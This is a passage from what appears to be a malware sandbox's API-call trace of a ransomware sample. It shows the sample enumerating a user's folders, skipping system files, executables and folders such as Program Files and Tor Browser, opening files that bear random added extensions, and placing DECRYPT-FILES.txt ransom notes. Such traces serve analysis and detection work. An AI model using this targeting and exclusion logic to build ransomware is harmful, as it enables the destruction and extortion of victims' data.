HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0xf126daa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf126daa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0185.299] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.299] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0xf126daa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf126daa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.299] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.299] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.299] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf126daa0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf126daa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf126daa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.299] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.299] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.299] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.299] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.299] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.299] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.299] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.299] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.299] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.299] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.299] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.299] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.299] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.299] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.299] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.299] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned 54 [0185.299] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.299] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0185.299] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\0a16c9.tmp" [0185.299] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.300] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.300] CloseHandle (hObject=0x0) returned 0 [0185.300] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.300] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae68cb60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae68cb60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae68cb60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.300] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.300] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0xae6fef80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x42508, dwReserved0=0x0, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst.8aBr9ft", cAlternateFileName="VOEIMD~1.8AB")) returned 1 [0185.300] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst.8aBr9ft", lpString2="DECRYPT-FILES.txt") returned 1 [0185.300] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst.8aBr9ft", lpString2="autorun.inf") returned 1 [0185.300] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst.8aBr9ft", lpString2="boot.ini") returned 1 [0185.300] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst.8aBr9ft", lpString2="desktop.ini") returned 1 [0185.300] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst.8aBr9ft", lpString2="ntuser.dat") returned 1 [0185.300] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst.8aBr9ft", lpString2="iconcache.db") returned 1 [0185.300] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst.8aBr9ft", lpString2="bootsect.bak") returned 1 [0185.300] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst.8aBr9ft", lpString2="ntuser.dat.log") returned 1 [0185.300] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst.8aBr9ft", lpString2="thumbs.db") returned 1 [0185.300] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst.8aBr9ft", lpString2="Bootfont.bin") returned 1 [0185.300] lstrlenW (lpString="voeimd@djhreuu.uhd.pst.8aBr9ft") returned 30 [0185.300] lstrcmpiW (lpString1="8aBr9ft", lpString2="lnk") returned -1 [0185.300] lstrcmpiW (lpString1="8aBr9ft", lpString2="exe") returned -1 [0185.300] lstrcmpiW (lpString1="8aBr9ft", lpString2="sys") returned -1 [0185.300] lstrcmpiW (lpString1="8aBr9ft", lpString2="dll") returned -1 [0185.300] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned 54 [0185.300] lstrlenW (lpString="voeimd@djhreuu.uhd.pst.8aBr9ft") returned 30 [0185.301] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0185.301] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpString2="voeimd@djhreuu.uhd.pst.8aBr9ft" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.8aBr9ft") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.8aBr9ft" [0185.301] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.301] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.8aBr9ft" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.8abr9ft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.301] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=271624) returned 1 [0185.301] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.301] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x24e0000 [0185.302] UnmapViewOfFile (lpBaseAddress=0x24e0000) returned 1 [0185.302] CloseHandle (hObject=0x268) returned 1 [0185.302] CloseHandle (hObject=0x264) returned 1 [0185.302] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.303] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0xae6fef80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x42508, dwReserved0=0x0, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst.8aBr9ft", cAlternateFileName="VOEIMD~1.8AB")) returned 0 [0185.303] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0185.303] CloseHandle (hObject=0x25c) returned 1 [0185.303] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9104500, ftCreationTime.dwHighDateTime=0x1d58036, ftLastAccessTime.dwLowDateTime=0x63d17ad0, ftLastAccessTime.dwHighDateTime=0x1d56b56, ftLastWriteTime.dwLowDateTime=0xae7250e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x8cb4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pvsZVe21XhXYV.docx.pFTllnJ", cAlternateFileName="PVSZVE~1.PFT")) returned 1 [0185.303] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx.pFTllnJ", lpString2="DECRYPT-FILES.txt") returned 1 [0185.303] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx.pFTllnJ", lpString2="autorun.inf") returned 1 [0185.303] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx.pFTllnJ", lpString2="boot.ini") returned 1 [0185.303] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx.pFTllnJ", lpString2="desktop.ini") returned 1 [0185.303] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx.pFTllnJ", lpString2="ntuser.dat") returned 1 [0185.303] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx.pFTllnJ", lpString2="iconcache.db") returned 1 [0185.303] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx.pFTllnJ", lpString2="bootsect.bak") returned 1 [0185.303] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx.pFTllnJ", lpString2="ntuser.dat.log") returned 1 [0185.303] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx.pFTllnJ", lpString2="thumbs.db") returned -1 [0185.303] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx.pFTllnJ", lpString2="Bootfont.bin") returned 1 [0185.303] lstrlenW (lpString="pvsZVe21XhXYV.docx.pFTllnJ") returned 26 [0185.303] lstrcmpiW (lpString1="pFTllnJ", lpString2="lnk") returned 1 [0185.303] lstrcmpiW (lpString1="pFTllnJ", lpString2="exe") returned 1 [0185.303] lstrcmpiW (lpString1="pFTllnJ", lpString2="sys") returned -1 [0185.303] lstrcmpiW (lpString1="pFTllnJ", lpString2="dll") returned 1 [0185.303] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0185.303] lstrlenW (lpString="pvsZVe21XhXYV.docx.pFTllnJ") returned 26 [0185.303] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0185.303] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="pvsZVe21XhXYV.docx.pFTllnJ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pvsZVe21XhXYV.docx.pFTllnJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pvsZVe21XhXYV.docx.pFTllnJ" [0185.303] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.304] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pvsZVe21XhXYV.docx.pFTllnJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pvszve21xhxyv.docx.pftllnj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0185.304] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=36020) returned 1 [0185.304] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0185.304] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.305] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.305] CloseHandle (hObject=0x260) returned 1 [0185.305] CloseHandle (hObject=0x25c) returned 1 [0185.305] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.305] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x570537c0, ftCreationTime.dwHighDateTime=0x1d53eff, ftLastAccessTime.dwLowDateTime=0x575a2da0, ftLastAccessTime.dwHighDateTime=0x1d54faa, ftLastWriteTime.dwLowDateTime=0xae7713a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xfa08, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rM7ylqPkY2XjY0bBIgTA.docx.d8kQ", cAlternateFileName="RM7YLQ~1.D8K")) returned 1 [0185.306] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx.d8kQ", lpString2="DECRYPT-FILES.txt") returned 1 [0185.306] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx.d8kQ", lpString2="autorun.inf") returned 1 [0185.306] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx.d8kQ", lpString2="boot.ini") returned 1 [0185.306] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx.d8kQ", lpString2="desktop.ini") returned 1 [0185.306] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx.d8kQ", lpString2="ntuser.dat") returned 1 [0185.306] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx.d8kQ", lpString2="iconcache.db") returned 1 [0185.306] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx.d8kQ", lpString2="bootsect.bak") returned 1 [0185.306] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx.d8kQ", lpString2="ntuser.dat.log") returned 1 [0185.306] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx.d8kQ", lpString2="thumbs.db") returned -1 [0185.306] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx.d8kQ", lpString2="Bootfont.bin") returned 1 [0185.306] lstrlenW (lpString="rM7ylqPkY2XjY0bBIgTA.docx.d8kQ") returned 30 [0185.306] lstrcmpiW (lpString1="d8kQ", lpString2="lnk") returned -1 [0185.306] lstrcmpiW (lpString1="d8kQ", lpString2="exe") returned -1 [0185.306] lstrcmpiW (lpString1="d8kQ", lpString2="sys") returned -1 [0185.306] lstrcmpiW (lpString1="d8kQ", lpString2="dll") returned -1 [0185.306] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0185.306] lstrlenW (lpString="rM7ylqPkY2XjY0bBIgTA.docx.d8kQ") returned 30 [0185.306] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0185.306] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="rM7ylqPkY2XjY0bBIgTA.docx.d8kQ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rM7ylqPkY2XjY0bBIgTA.docx.d8kQ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rM7ylqPkY2XjY0bBIgTA.docx.d8kQ" [0185.306] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rM7ylqPkY2XjY0bBIgTA.docx.d8kQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rm7ylqpky2xjy0bbigta.docx.d8kq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0185.307] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=64008) returned 1 [0185.307] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0185.307] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.307] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.307] CloseHandle (hObject=0x260) returned 1 [0185.308] CloseHandle (hObject=0x25c) returned 1 [0185.308] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.308] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e76b60, ftCreationTime.dwHighDateTime=0x1d4c81b, ftLastAccessTime.dwLowDateTime=0xaec33fa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaec33fa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S3f3UGhxqbgggRUc", cAlternateFileName="S3F3UG~1")) returned 1 [0185.308] lstrcmpW (lpString1="S3f3UGhxqbgggRUc", lpString2=".") returned 1 [0185.308] lstrcmpW (lpString1="S3f3UGhxqbgggRUc", lpString2="..") returned 1 [0185.308] lstrcatW (in: lpString1="S3f3UGhxqbgggRUc", lpString2="\\" | out: lpString1="S3f3UGhxqbgggRUc\\") returned="S3f3UGhxqbgggRUc\\" [0185.308] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0185.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\Program Files") returned 0x0 [0185.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch=":\\Windows") returned 0x0 [0185.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\Games\\") returned 0x0 [0185.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\All Users") returned 0x0 [0185.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="AhnLab") returned 0x0 [0185.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.308] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0185.308] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.308] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\\\0a16c9.tmp") returned 68 [0185.308] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0185.310] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0185.310] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.310] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\\\DECRYPT-FILES.txt") returned 75 [0185.310] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.311] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0185.311] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\*" [0185.311] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e76b60, ftCreationTime.dwHighDateTime=0x1d4c81b, ftLastAccessTime.dwLowDateTime=0xf1293c00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1293c00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0185.311] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.311] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e76b60, ftCreationTime.dwHighDateTime=0x1d4c81b, ftLastAccessTime.dwLowDateTime=0xf1293c00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1293c00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.311] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.311] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.312] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ac05870, ftCreationTime.dwHighDateTime=0x1d4d104, ftLastAccessTime.dwLowDateTime=0x5f4b3410, ftLastAccessTime.dwHighDateTime=0x1d4cdd1, ftLastWriteTime.dwLowDateTime=0xae797500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x80d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="-Wm-t35s2VO0tWM.pdf.eBbly", cAlternateFileName="-WM-T3~1.EBB")) returned 1 [0185.312] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf.eBbly", lpString2="DECRYPT-FILES.txt") returned 1 [0185.312] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf.eBbly", lpString2="autorun.inf") returned 1 [0185.312] lstrcmpiW 